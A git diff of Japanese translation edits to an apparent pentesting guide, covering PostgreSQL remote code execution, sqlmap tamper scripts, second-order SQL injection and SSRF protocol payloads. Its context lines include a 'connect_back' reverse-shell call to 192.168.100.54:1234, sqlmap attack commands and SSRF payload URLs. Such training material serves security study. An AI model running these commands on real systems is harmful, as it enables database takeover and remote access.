 create function connect_back(text, integer) returns void as '../data/poc', 'connect_back' language C strict;
 select connect_back('192.168.100.54', 1234);
 ```
-_注意：create関数が拡張子`.dll`を追加するため、付加する必要はありません。_
+_注意：create関数が拡張子を追加するため、`.dll`拡張子を付ける必要はありません。_
 
-詳細については、**[こちらの元の出版物を読む](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**。\
-その出版物では、**[postgres拡張を生成するために使用されたコード](https://github.com/sourceincite/tools/blob/master/pgpwn.c)**が示されています（_postgres拡張をコンパイルする方法については、以前のバージョンのいずれかを参照してください_）。\
-同じページで、この技術を自動化するための**エクスプロイトが提供されました**：
+詳細については、**[こちらの元の出版物をお読みください](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**。\
+その出版物では、**[postgres拡張を生成するために使用されたコード](https://github.com/sourceincite/tools/blob/master/pgpwn.c)**が示されています（_postgres拡張をコンパイルする方法を学ぶには、以前のバージョンのいずれかをお読みください_）。\
+同じページには、この技術を自動化するための**エクスプロイト**が示されています：
 ```python
 #!/usr/bin/env python3
 import sys
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
index 79308211e..c09b2f435 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
@@ -4,15 +4,15 @@
 
 ## PostgreSQL Languages
 
-アクセスしたPostgreSQLデータベースには、**任意のコードを実行する**ために悪用できる異なる**スクリプト言語がインストールされている**可能性があります。
+アクセスしたPostgreSQLデータベースには、**任意のコードを実行するために悪用できる**異なる**スクリプト言語がインストールされている**可能性があります。
 
-**それらを実行する**ことができます:
+**それらを実行することができます**:
 ```sql
 \dL *
 
 SELECT lanname,lanpltrusted,lanacl FROM pg_language;
 ```
-PostgreSQLにインストールできるスクリプト言語のほとんどには**2つの種類**があります：**trusted**と**untrusted**です。**untrusted**は**"u"で終わる名前**を持ち、**コードを実行**したり、他の興味深い機能を使用することを許可するバージョンです。インストールされていると興味深い言語は以下の通りです：
+PostgreSQLにインストールできるスクリプト言語のほとんどは、**2つの種類**があります：**trusted**と**untrusted**。**untrusted**は**"u"で終わる名前**を持ち、**コードを実行**したり、他の興味深い機能を使用することを許可するバージョンです。インストールされていると興味深い言語は以下の通りです：
 
 - **plpythonu**
 - **plpython3u**
@@ -41,7 +41,7 @@ PostgreSQLにインストールできるスクリプト言語のほとんどに
 > CREATE EXTENSION plrubyu;
 > ```
 
-安全なバージョンを「不安全」としてコンパイルすることも可能であることに注意してください。例えば、[**これ**](https://www.robbyonrails.com/articles/2005/08/22/installing-untrusted-pl-ruby-for-postgresql.html)を確認してください。したがって、**trusted**のものしかインストールされていなくても、コードを実行できるかどうか試してみる価値があります。
+安全なバージョンを「不安全」としてコンパイルすることも可能です。例えば、[**これ**](https://www.robbyonrails.com/articles/2005/08/22/installing-untrusted-pl-ruby-for-postgresql.html)を確認してください。したがって、**trusted**のものしかインストールされていなくても、コードを実行できるかどうか試してみる価値があります。
 
 ## plpythonu/plpython3u
 
@@ -91,7 +91,7 @@ SELECT lsdir("/"); #List dir
 ```
 {{#endtab}}
 
-{{#tab name="Wフォルダを見つける"}}
+{{#tab name="Wフォルダーを見つける"}}
 ```sql
 CREATE OR REPLACE FUNCTION findw (dir text)
 RETURNS VARCHAR(65535) stable
@@ -224,7 +224,7 @@ SELECT find_exe("psql"); #Find executable by susbstring
 ```
 {{#endtab}}
 
-{{#tab name="Read"}}
+{{#tab name="読む"}}
 ```sql
 CREATE OR REPLACE FUNCTION read (path text)
 RETURNS VARCHAR(65535) stable
diff --git a/src/pentesting-web/sql-injection/sqlmap.md b/src/pentesting-web/sql-injection/sqlmap.md
index 7efe364f1..400d68073 100644
--- a/src/pentesting-web/sql-injection/sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap.md
@@ -93,7 +93,7 @@ sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threa
 --crawl = how deep you want to crawl a site
 --forms = Parse and test forms
 ```
-# カスタマイズされたインジェクション
+# インジェクションのカスタマイズ
 
 ## サフィックスを設定する
 ```bash
@@ -115,51 +115,51 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 ```
 | Tamper                       | Description                                                                                                                        |
 | :--------------------------- | :--------------------------------------------------------------------------------------------------------------------------------- |
-| apostrophemask.py            | アポストロフィ文字をそのUTF-8全幅対応文字に置き換えます。                                                                 |
+| apostrophemask.py            | アポストロフィ文字をそのUTF-8全幅の対応文字に置き換えます。                                                                 |
 | apostrophenullencode.py      | アポストロフィ文字をその不正な二重Unicode対応文字に置き換えます。                                                              |
 | appendnullbyte.py            | ペイロードの末尾にエンコードされたNULLバイト文字を追加します。                                                                    |
-| base64encode.py              | 指定されたペイロード内のすべての文字をBase64エンコードします。                                                                  |
+| base64encode.py              | 指定されたペイロード内のすべての文字をBase64エンコードします。                                                                    |
 | between.py                   | 大なり演算子 \('&gt;'\) を 'NOT BETWEEN 0 AND \#' に置き換えます。                                                              |
-| bluecoat.py                  | SQL文の後のスペース文字を有効なランダム空白文字に置き換えます。その後、文字 = をLIKE演算子に置き換えます。                     |
-| chardoubleencode.py          | 指定されたペイロード内のすべての文字を二重URLエンコードします（すでにエンコードされたものは処理しません）。                     |
-| commalesslimit.py            | 'LIMIT M, N' のようなインスタンスを 'LIMIT N OFFSET M' に置き換えます。                                                       |
+| bluecoat.py                  | SQL文の後のスペース文字を有効なランダムな空白文字に置き換えます。その後、文字 = をLIKE演算子に置き換えます。                     |
+| chardoubleencode.py          | 指定されたペイロード内のすべての文字を二重URLエンコードします（すでにエンコードされたものは処理しません）。                       |
+| commalesslimit.py            | 'LIMIT M, N' のようなインスタンスを 'LIMIT N OFFSET M' に置き換えます。                                                        |
 | commalessmid.py              | 'MID\(A, B, C\)' のようなインスタンスを 'MID\(A FROM B FOR C\)' に置き換えます。                                               |
-| concat2concatws.py           | 'CONCAT\(A, B\)' のようなインスタンスを 'CONCAT_WS\(MID\(CHAR\(0\), 0, 0\), A, B\)' に置き換えます。                          |
-| charencode.py                | 指定されたペイロード内のすべての文字をURLエンコードします（すでにエンコードされたものは処理しません）。                        |
-| charunicodeencode.py         | 指定されたペイロード内の非エンコード文字をUnicode URLエンコードします（すでにエンコードされたものは処理しません）。"%u0022" |
-| charunicodeescape.py         | 指定されたペイロード内の非エンコード文字をUnicode URLエンコードします（すでにエンコードされたものは処理しません）。"\u0022" |
-| equaltolike.py               | 演算子等号 \('='\) のすべての出現を演算子 'LIKE' に置き換えます。                                                             |
-| escapequotes.py              | スラッシュで引用符 \(' と "\) をエスケープします。                                                                               |
-| greatest.py                  | 大なり演算子 \('&gt;'\) を 'GREATEST' 対応に置き換えます。                                                                     |
-| halfversionedmorekeywords.py | 各キーワードの前にバージョン付きMySQLコメントを追加します。                                                                     |
-| ifnull2ifisnull.py           | 'IFNULL\(A, B\)' のようなインスタンスを 'IF\(ISNULL\(A\), B, A\)' に置き換えます。                                             |
-| modsecurityversioned.py      | 完全なクエリをバージョン付きコメントで囲みます。                                                                                 |
-| modsecurityzeroversioned.py  | 完全なクエリをゼロバージョン付きコメントで囲みます。                                                                             |
-| multiplespaces.py            | SQLキーワードの周りに複数のスペースを追加します。                                                                               |
-| nonrecursivereplacement.py   | 事前定義されたSQLキーワードを置き換えに適した表現に置き換えます（例：.replace\("SELECT", ""\) フィルター）。                 |
-| percentage.py                | 各文字の前にパーセント記号 \('%'\) を追加します。                                                                                 |
-| overlongutf8.py              | 指定されたペイロード内のすべての文字を変換します（すでにエンコードされたものは処理しません）。                                 |
-| randomcase.py                | 各キーワード文字をランダムなケース値に置き換えます。                                                                           |
-| randomcomments.py            | SQLキーワードにランダムなコメントを追加します。                                                                                 |
-| securesphere.py              | 特別に作成された文字列を追加します。                                                                                             |
-| sp_password.py               | ペイロードの末尾に 'sp_password' を追加し、DBMSログからの自動的な難読化を行います。                                             |
-| space2comment.py             | スペース文字 \(' '\) をコメントに置き換えます。                                                                                 |
-| space2dash.py                | スペース文字 \(' '\) をダッシュコメント \('--'\) に置き換え、その後にランダムな文字列と改行 \('\n'\) を追加します。          |
-| space2hash.py                | スペース文字 \(' '\) をポンド文字 \('\#'\) に置き換え、その後にランダムな文字列と改行 \('\n'\) を追加します。                |
-| space2morehash.py            | スペース文字 \(' '\) をポンド文字 \('\#'\) に置き換え、その後にランダムな文字列と改行 \('\n'\) を追加します。                |
-| space2mssqlblank.py          | スペース文字 \(' '\) を有効な代替文字のセットからのランダムな空白文字に置き換えます。                                         |
-| space2mssqlhash.py           | スペース文字 \(' '\) をポンド文字 \('\#'\) に置き換え、その後に改行 \('\n'\) を追加します。                                   |
-| space2mysqlblank.py          | スペース文字 \(' '\) を有効な代替文字のセットからのランダムな空白文字に置き換えます。                                         |
-| space2mysqldash.py           | スペース文字 \(' '\) をダッシュコメント \('--'\) に置き換え、その後に改行 \('\n'\) を追加します。                           |
-| space2plus.py                | スペース文字 \(' '\) をプラス \('+'\) に置き換えます。                                                                          |
-| space2randomblank.py         | スペース文字 \(' '\) を有効な代替文字のセットからのランダムな空白文字に置き換えます。                                         |
-| symboliclogical.py           | ANDおよびOR論理演算子をその記号対応 \(&& と                                                    |
-| unionalltounion.py           | UNION ALL SELECT を UNION SELECT に置き換えます。                                                                                |
-| unmagicquotes.py             | 引用文字 \('\) をマルチバイトコンボ %bf%27 と一般的なコメントを末尾に追加します（動作させるため）。                             |
+| concat2concatws.py           | 'CONCAT\(A, B\)' のようなインスタンスを 'CONCAT_WS\(MID\(CHAR\(0\), 0, 0\), A, B\)' に置き換えます。                           |
+| charencode.py                | 指定されたペイロード内のすべての文字をURLエンコードします（すでにエンコードされたものは処理しません）。                          |
+| charunicodeencode.py         | 指定されたペイロード内の非エンコード文字をUnicode URLエンコードします（すでにエンコードされたものは処理しません）。 "%u0022"  |
+| charunicodeescape.py         | 指定されたペイロード内の非エンコード文字をUnicode URLエンコードします（すでにエンコードされたものは処理しません）。 "\u0022"  |
+| equaltolike.py               | 演算子等号 \('='\) のすべての出現を演算子 'LIKE' に置き換えます。                                                              |
+| escapequotes.py              | スラッシュで引用符 \(' と "\) をエスケープします。                                                                                |
+| greatest.py                  | 大なり演算子 \('&gt;'\) を 'GREATEST' 対応物に置き換えます。                                                                    |
+| halfversionedmorekeywords.py | 各キーワードの前にバージョン付きMySQLコメントを追加します。                                                                      |
+| ifnull2ifisnull.py           | 'IFNULL\(A, B\)' のようなインスタンスを 'IF\(ISNULL\(A\), B, A\)' に置き換えます。                                              |
+| modsecurityversioned.py      | 完全なクエリをバージョン付きコメントで囲みます。                                                                                  |
+| modsecurityzeroversioned.py  | 完全なクエリをゼロバージョン付きコメントで囲みます。                                                                              |
+| multiplespaces.py            | SQLキーワードの周りに複数のスペースを追加します。                                                                                |
+| nonrecursivereplacement.py   | 置換に適した定義済みSQLキーワードを置き換えます（例：.replace\("SELECT", ""\) フィルター）。                                     |
+| percentage.py                | 各文字の前にパーセント記号 \('%'\) を追加します。                                                                                  |
+| overlongutf8.py              | 指定されたペイロード内のすべての文字を変換します（すでにエンコードされたものは処理しません）。                                    |
+| randomcase.py                | 各キーワード文字をランダムなケース値に置き換えます。                                                                            |
+| randomcomments.py            | SQLキーワードにランダムなコメントを追加します。                                                                                  |
+| securesphere.py              | 特別に作成された文字列を追加します。                                                                                              |
+| sp_password.py               | ペイロードの末尾に 'sp_password' を追加し、DBMSログからの自動的な難読化を行います。                                               |
+| space2comment.py             | スペース文字 \(' '\) をコメントに置き換えます。                                                                                   |
+| space2dash.py                | スペース文字 \(' '\) をダッシュコメント \('--'\) に置き換え、その後にランダムな文字列と改行 \('\n'\) を追加します。              |
+| space2hash.py                | スペース文字 \(' '\) をポンド文字 \('\#'\) に置き換え、その後にランダムな文字列と改行 \('\n'\) を追加します。                   |
+| space2morehash.py            | スペース文字 \(' '\) をポンド文字 \('\#'\) に置き換え、その後にランダムな文字列と改行 \('\n'\) を追加します。                   |
+| space2mssqlblank.py          | スペース文字 \(' '\) を有効な代替文字のセットからのランダムな空白文字に置き換えます。                                            |
+| space2mssqlhash.py           | スペース文字 \(' '\) をポンド文字 \('\#'\) に置き換え、その後に改行 \('\n'\) を追加します。                                      |
+| space2mysqlblank.py          | スペース文字 \(' '\) を有効な代替文字のセットからのランダムな空白文字に置き換えます。                                            |
+| space2mysqldash.py           | スペース文字 \(' '\) をダッシュコメント \('--'\) に置き換え、その後に改行 \('\n'\) を追加します。                              |
+| space2plus.py                | スペース文字 \(' '\) をプラス \('+'\) に置き換えます。                                                                           |
+| space2randomblank.py         | スペース文字 \(' '\) を有効な代替文字のセットからのランダムな空白文字に置き換えます。                                            |
+| symboliclogical.py           | ANDおよびOR論理演算子をその記号対応物 \(&& と                                                    |
+| unionalltounion.py           | UNION ALL SELECT を UNION SELECT に置き換えます。                                                                                 |
+| unmagicquotes.py             | 引用文字 \('\) をマルチバイトコンボ %bf%27 と一般的なコメントを末尾に追加します（動作させるため）。                               |
 | uppercase.py                 | 各キーワード文字を大文字の値 'INSERT' に置き換えます。                                                                          |
-| varnish.py                   | HTTPヘッダー 'X-originating-IP' を追加します。                                                                                   |
-| versionedkeywords.py         | 各非関数キーワードをバージョン付きMySQLコメントで囲みます。                                                                     |
-| versionedmorekeywords.py     | 各キーワードをバージョン付きMySQLコメントで囲みます。                                                                           |
-| xforwardedfor.py             | 偽のHTTPヘッダー 'X-Forwarded-For' を追加します。                                                                                 |
+| varnish.py                   | HTTPヘッダー 'X-originating-IP' を追加します。                                                                                     |
+| versionedkeywords.py         | 各非関数キーワードをバージョン付きMySQLコメントで囲みます。                                                                      |
+| versionedmorekeywords.py     | 各キーワードをバージョン付きMySQLコメントで囲みます。                                                                            |
+| xforwardedfor.py             | 偽のHTTPヘッダー 'X-Forwarded-For' を追加します。                                                                                  |
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/sql-injection/sqlmap/README.md b/src/pentesting-web/sql-injection/sqlmap/README.md
index 6dc32a920..9b6665a85 100644
--- a/src/pentesting-web/sql-injection/sqlmap/README.md
+++ b/src/pentesting-web/sql-injection/sqlmap/README.md
@@ -2,6 +2,7 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
+
 ## SQLmapの基本引数
 
 ### 一般的な
@@ -81,7 +82,7 @@ sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
 ```
 ### Eval
 
-**Sqlmap** は、`-e` または `--eval` を使用して、ペイロードを送信する前にいくつかの Python ワンライナーで処理することを可能にします。これにより、送信する前にペイロードをカスタム方式で処理するのが非常に簡単で迅速になります。次の例では、**flask cookie session** **は、送信する前に既知の秘密で flask によって署名されています**:
+**Sqlmap** は、`-e` または `--eval` を使用して、ペイロードを送信する前にいくつかの Python ワンライナーで処理することを可能にします。これにより、送信する前にペイロードをカスタム方式で非常に簡単かつ迅速に処理できます。次の例では、**flask cookie session** **は、送信する前に既知の秘密で flask によって署名されています**:
 ```bash
 sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
 ```
@@ -132,7 +133,7 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 ```
 ### Tamper
 
-**自分自身のタムパーをPythonで作成することができる**ことを忘れないでください。タムパーの例は、[Second Order Injection page here](second-order-injection-sqlmap.md)にあります。
+**自分のタムパーをPythonで作成することができ、非常に簡単です。** タムパーの例は、[Second Order Injection page here](second-order-injection-sqlmap.md)で見つけることができます。
 ```bash
 --tamper=name_of_the_tamper
 #In kali you can see all the tampers in /usr/share/sqlmap/tamper
@@ -143,46 +144,48 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 | apostrophenullencode.py      | アポストロフィ文字をその不正な二重Unicode対応文字に置き換えます。                                                              |
 | appendnullbyte.py            | ペイロードの最後にエンコードされたNULLバイト文字を追加します。                                                                    |
 | base64encode.py              | 指定されたペイロード内のすべての文字をBase64エンコードします。                                                                    |
-| between.py                   | 大なり演算子（'>'）を 'NOT BETWEEN 0 AND #' に置き換えます。                                                                     |
-| bluecoat.py                  | SQL文の後のスペース文字を有効なランダムな空白文字に置き換えます。その後、文字 '=' を LIKE 演算子に置き換えます。               |
-| chardoubleencode.py          | 指定されたペイロード内のすべての文字を二重URLエンコードします（すでにエンコードされたものは処理しません）。                       |
-| commalesslimit.py            | 'LIMIT M, N' のようなインスタンスを 'LIMIT N OFFSET M' に置き換えます。                                                        |
-| commalessmid.py              | 'MID(A, B, C)' のようなインスタンスを 'MID(A FROM B FOR C)' に置き換えます。                                                   |
-| concat2concatws.py           | 'CONCAT(A, B)' のようなインスタンスを 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' に置き換えます。                                   |
-| charencode.py                | 指定されたペイロード内のすべての文字をURLエンコードします（すでにエンコードされたものは処理しません）。                          |
-| charunicodeencode.py         | 指定されたペイロード内の非エンコード文字をUnicode URLエンコードします（すでにエンコードされたものは処理しません）。 "%u0022"  |
-| charunicodeescape.py         | 指定されたペイロード内の非エンコード文字をUnicode URLエンコードします（すでにエンコードされたものは処理しません）。 "\u0022"  |
-| equaltolike.py               | 演算子等号（'='）のすべての出現を演算子 'LIKE' に置き換えます。                                                                |
+| between.py                   | 大なり演算子（'>'）を「NOT BETWEEN 0 AND #」に置き換えます。                                                                     |
+| bluecoat.py                  | SQL文の後のスペース文字を有効なランダムな空白文字に置き換えます。その後、文字「=」をLIKE演算子に置き換えます。                     |
+| chardoubleencode.py          | 指定されたペイロード内のすべての文字を二重URLエンコードします（すでにエンコードされたものは処理しません）。                          |
+| commalesslimit.py            | 「LIMIT M, N」のようなインスタンスを「LIMIT N OFFSET M」に置き換えます。                                                       |
+| commalessmid.py              | 「MID(A, B, C)」のようなインスタンスを「MID(A FROM B FOR C)」に置き換えます。                                                  |
+| concat2concatws.py           | 「CONCAT(A, B)」のようなインスタンスを「CONCAT_WS(MID(CHAR(0), 0, 0), A, B)」に置き換えます。                                   |
+| charencode.py                | 指定されたペイロード内のすべての文字をURLエンコードします（すでにエンコードされたものは処理しません）。                           |
+| charunicodeencode.py         | 指定されたペイロード内の非エンコード文字をUnicode URLエンコードします（すでにエンコードされたものは処理しません）。 "%u0022"   |
+| charunicodeescape.py         | 指定されたペイロード内の非エンコード文字をUnicode URLエンコードします（すでにエンコードされたものは処理しません）。 "\u0022"   |
+| equaltolike.py               | 演算子「=」のすべての出現を演算子「LIKE」に置き換えます。                                                                       |
 | escapequotes.py              | クォート（' と "）をスラッシュでエスケープします。                                                                               |
-| greatest.py                  | 大なり演算子（'>'）を 'GREATEST' 対応に置き換えます。                                                                           |
-| halfversionedmorekeywords.py | 各キーワードの前にバージョン付きMySQLコメントを追加します。                                                                     |
-| ifnull2ifisnull.py           | 'IFNULL(A, B)' のようなインスタンスを 'IF(ISNULL(A), B, A)' に置き換えます。                                                  |
+| greatest.py                  | 大なり演算子（'>'）を「GREATEST」に置き換えます。                                                                                |
+| halfversionedmorekeywords.py | 各キーワードの前にバージョン付きMySQLコメントを追加します。                                                                      |
+| ifnull2ifisnull.py           | 「IFNULL(A, B)」のようなインスタンスを「IF(ISNULL(A), B, A)」に置き換えます。                                                  |
 | modsecurityversioned.py      | 完全なクエリをバージョン付きコメントで囲みます。                                                                                |
 | modsecurityzeroversioned.py  | 完全なクエリをゼロバージョン付きコメントで囲みます。                                                                            |
-| multiplespaces.py            | SQLキーワードの周りに複数のスペースを追加します。                                                                               |
-| nonrecursivereplacement.py   | 定義済みのSQLキーワードを置き換えに適した表現に置き換えます（例：.replace("SELECT", "") フィルター）。                        |
+| multiplespaces.py            | SQLキーワードの周りに複数のスペースを追加します。                                                                                |
+| nonrecursivereplacement.py   | 置換に適した表現で事前定義されたSQLキーワードを置き換えます（例：.replace("SELECT", ""）フィルター）。                          |
 | percentage.py                | 各文字の前にパーセント記号（'%'）を追加します。                                                                                   |
 | overlongutf8.py              | 指定されたペイロード内のすべての文字を変換します（すでにエンコードされたものは処理しません）。                                   |
-| randomcase.py                | 各キーワード文字をランダムなケース値に置き換えます。                                                                           |
-| randomcomments.py            | SQLキーワードにランダムなコメントを追加します。                                                                                 |
-| securesphere.py              | 特別に作成された文字列を追加します。                                                                                             |
-| sp_password.py               | ペイロードの最後に 'sp_password' を追加してDBMSログからの自動的な難読化を行います。                                              |
-| space2comment.py             | スペース文字（' '）をコメントに置き換えます。                                                                                   |
-| space2dash.py                | スペース文字（' '）をダッシュコメント（'--'）に置き換え、その後にランダムな文字列と改行（'\n'）を追加します。                 |
-| space2hash.py                | スペース文字（' '）をポンド文字（'#'）に置き換え、その後にランダムな文字列と改行（'\n'）を追加します。                       |
-| space2morehash.py            | スペース文字（' '）をポンド文字（'#'）に置き換え、その後にランダムな文字列と改行（'\n'）を追加します。                       |
-| space2mssqlblank.py          | スペース文字（' '）を有効な代替文字のセットからのランダムな空白文字に置き換えます。                                           |
+| randomcase.py                | 各キーワード文字をランダムなケース値に置き換えます。                                                                            |
+| randomcomments.py            | SQLキーワードにランダムなコメントを追加します。                                                                                  |
+| securesphere.py              | 特別に作成された文字列を追加します。                                                                                              |
+| sp_password.py               | ペイロードの最後に「sp_password」を追加してDBMSログからの自動的な難読化を行います。                                              |
+| space2comment.py             | スペース文字（' '）をコメントに置き換えます。                                                                                     |
+| space2dash.py                | スペース文字（' '）をダッシュコメント（'--'）に置き換え、その後にランダムな文字列と改行（'\n'）を追加します。                  |
+| space2hash.py                | スペース文字（' '）をポンド文字（'#'）に置き換え、その後にランダムな文字列と改行（'\n'）を追加します。                        |
+| space2morehash.py            | スペース文字（' '）をポンド文字（'#'）に置き換え、その後にランダムな文字列と改行（'\n'）を追加します。                        |
+| space2mssqlblank.py          | スペース文字（' '）を有効な代替文字のセットからのランダムな空白文字に置き換えます。                                            |
 | space2mssqlhash.py           | スペース文字（' '）をポンド文字（'#'）に置き換え、その後に改行（'\n'）を追加します。                                          |
-| space2mysqlblank.py          | スペース文字（' '）を有効な代替文字のセットからのランダムな空白文字に置き換えます。                                           |
+| space2mysqlblank.py          | スペース文字（' '）を有効な代替文字のセットからのランダムな空白文字に置き換えます。                                            |
 | space2mysqldash.py           | スペース文字（' '）をダッシュコメント（'--'）に置き換え、その後に改行（'\n'）を追加します。                                   |
-| space2plus.py                | スペース文字（' '）をプラス（'+'）に置き換えます。                                                                             |
-| space2randomblank.py         | スペース文字（' '）を有効な代替文字のセットからのランダムな空白文字に置き換えます。                                           |
-| symboliclogical.py           | ANDおよびOR論理演算子をその記号対応（&&および）に置き換えます。                                                                |
-| unionalltounion.py           | UNION ALL SELECT を UNION SELECT に置き換えます。                                                                                |
-| unmagicquotes.py             | クォート文字（'）をマルチバイトコンボ %bf%27 に置き換え、最後に一般的なコメントを追加します（動作させるため）。                |
-| uppercase.py                 | 各キーワード文字を大文字の値 'INSERT' に置き換えます。                                                                        |
-| varnish.py                   | HTTPヘッダー 'X-originating-IP' を追加します。                                                                                   |
-| versionedkeywords.py         | 各非関数キーワードをバージョン付きMySQLコメントで囲みます。                                                                    |
-| versionedmorekeywords.py     | 各キーワードをバージョン付きMySQLコメントで囲みます。                                                                          |
+| space2plus.py                | スペース文字（' '）をプラス（'+'）に置き換えます。                                                                               |
+| space2randomblank.py         | スペース文字（' '）を有効な代替文字のセットからのランダムな空白文字に置き換えます。                                            |
+| symboliclogical.py           | ANDおよびOR論理演算子をその記号対応物（&&および）に置き換えます。                                                               |
+| unionalltounion.py           | UNION ALL SELECTをUNION SELECTに置き換えます。                                                                                   |
+| unmagicquotes.py             | クォート文字（'）をマルチバイトコンボ%bf%27に置き換え、最後に一般的なコメントを追加します（機能させるため）。                   |
+| uppercase.py                 | 各キーワード文字を大文字の「INSERT」に置き換えます。                                                                            |
+| varnish.py                   | HTTPヘッダー「X-originating-IP」を追加します。                                                                                   |
+| versionedkeywords.py         | 各非関数キーワードをバージョン付きMySQLコメントで囲みます。                                                                      |
+| versionedmorekeywords.py     | 各キーワードをバージョン付きMySQLコメントで囲みます。                                                                            |
+| xforwardedfor.py             | 偽のHTTPヘッダー「X-Forwarded-For」を追加します。                                                                                |
+
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
index eb6c38e6e..2ae79fc0f 100644
--- a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
@@ -4,7 +4,7 @@
 提供する必要があるのは：
 
 - **SQLインジェクションペイロード**が保存される**リクエスト**
-- **ペイロード**が**実行される****リクエスト**
+- **ペイロード**が**実行される**リクエスト
 
 SQLインジェクションペイロードが保存されるリクエストは、**sqlmapの他のインジェクションと同様に示されます**。SQLインジェクションの出力/実行をsqlmapが読み取ることができるリクエストは、`--second-url`またはファイルから完全なリクエストを示す必要がある場合は`--second-req`で示すことができます。
 
@@ -16,9 +16,9 @@ sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"
 #Get the SQL payload execution sending a custom request from a file
 sqlmap -r login.txt -p username --second-req details.txt
 ```
-いくつかのケースでは**これだけでは不十分**であり、ペイロードを送信し、別のページにアクセスする以外の**他のアクションを実行する必要があります**。
+いくつかのケースでは**これだけでは不十分**であり、ペイロードを送信して別のページにアクセスする以外に**他のアクションを実行する必要があります**。
 
-これが必要な場合は、**sqlmap tamper**を使用できます。たとえば、次のスクリプトは**sqlmapペイロードをメールとして使用して新しいユーザーを登録し**、ログアウトします。
+これが必要な場合は、**sqlmap tamper**を使用できます。たとえば、次のスクリプトは**sqlmapペイロードをメールとして使用して**新しいユーザーを登録し、ログアウトします。
 ```python
 #!/usr/bin/env python
 
@@ -46,7 +46,7 @@ headers = kwargs.get("headers", {})
 login_account(payload)
 return payload
 ```
-A **SQLMap tamperは、ペイロードを使ってインジェクションを試みる前に常に実行されます** **そして、ペイロードを返す必要があります**。この場合、ペイロードには関心がありませんが、いくつかのリクエストを送信することに関心があるので、ペイロードは変更されません。
+A **SQLMap tamperは、ペイロードを使ってインジェクションを試みる前に常に実行され**、**ペイロードを返す必要があります**。この場合、ペイロードには関心がありませんが、いくつかのリクエストを送信することに関心があるため、ペイロードは変更されません。
 
 したがって、何らかの理由で第二次SQLインジェクションを悪用するためにより複雑なフローが必要な場合は、次のようになります：
 
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/README.md b/src/pentesting-web/ssrf-server-side-request-forgery/README.md
index a08ee2995..51e8a0938 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/README.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/README.md
@@ -22,7 +22,7 @@
 
 ## ホワイトリストドメインのバイパス
 
-通常、SSRFは **特定のホワイトリストドメイン** またはURLでのみ機能します。次のページには、そのホワイトリストをバイパスするための **技術のコンパイル** があります：
+通常、SSRFは**特定のホワイトリストドメイン**またはURLでのみ機能します。次のページには、そのホワイトリストをバイパスするための**技術のコンパイル**があります：
 
 {{#ref}}
 url-format-bypass.md
@@ -30,7 +30,7 @@ url-format-bypass.md
 
 ### オープンリダイレクトによるバイパス
 
-サーバーが適切に保護されている場合、**ウェブページ内のオープンリダイレクトを利用してすべての制限をバイパスすることができます**。ウェブページは **同じドメインへのSSRFを許可し、リダイレクトに従う可能性があるため、** オープンリダイレクトを利用してサーバーが内部の任意のリソースにアクセスするように仕向けることができます。\
+サーバーが適切に保護されている場合、**ウェブページ内のオープンリダイレクトを利用してすべての制限をバイパスすることができます**。ウェブページは**同じドメインへのSSRFを許可し、リダイレクトを**おそらく**追従するため、**オープンリダイレクトを利用してサーバーが内部の任意のリソースにアクセスするように仕向けることができます**。\
 詳細はこちらをお読みください: [https://portswigger.net/web-security/ssrf](https://portswigger.net/web-security/ssrf)
 
 ## プロトコル
@@ -40,13 +40,13 @@ url-format-bypass.md
 - **dict://**
 - DICT URLスキームは、DICTプロトコルを介して定義や単語リストにアクセスするために使用されることが説明されています。特定の単語、データベース、エントリ番号をターゲットにした構築されたURLの例が示され、攻撃者提供の資格情報を使用してDICTサーバーに接続するためにPHPスクリプトが悪用される可能性があることが示されています: `dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>`
 - **SFTP://**
-- セキュアシェルを介った安全なファイル転送のためのプロトコルとして特定され、悪意のあるSFTPサーバーに接続するためにPHPスクリプトが悪用される方法の例が示されています: `url=sftp://generic.com:11111/`
+- セキュアシェルを介った安全なファイル転送のためのプロトコルとして特定され、悪意のあるSFTPサーバーに接続するためにPHPスクリプトが悪用される方法の例が提供されています: `url=sftp://generic.com:11111/`
 - **TFTP://**
 - UDP上で動作するトリビアルファイル転送プロトコルが言及され、TFTPサーバーにリクエストを送信するために設計されたPHPスクリプトの例が示されています。TFTPリクエストは、ポート '12346' の 'generic.com' に対してファイル 'TESTUDPPACKET' に対して行われます: `ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET`
 - **LDAP://**
 - このセグメントでは、軽量ディレクトリアクセスプロトコルについて説明し、IPネットワークを介して分散ディレクトリ情報サービスを管理およびアクセスするための使用を強調しています。ローカルホストのLDAPサーバーと対話する: `'%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.`
 - **SMTP**
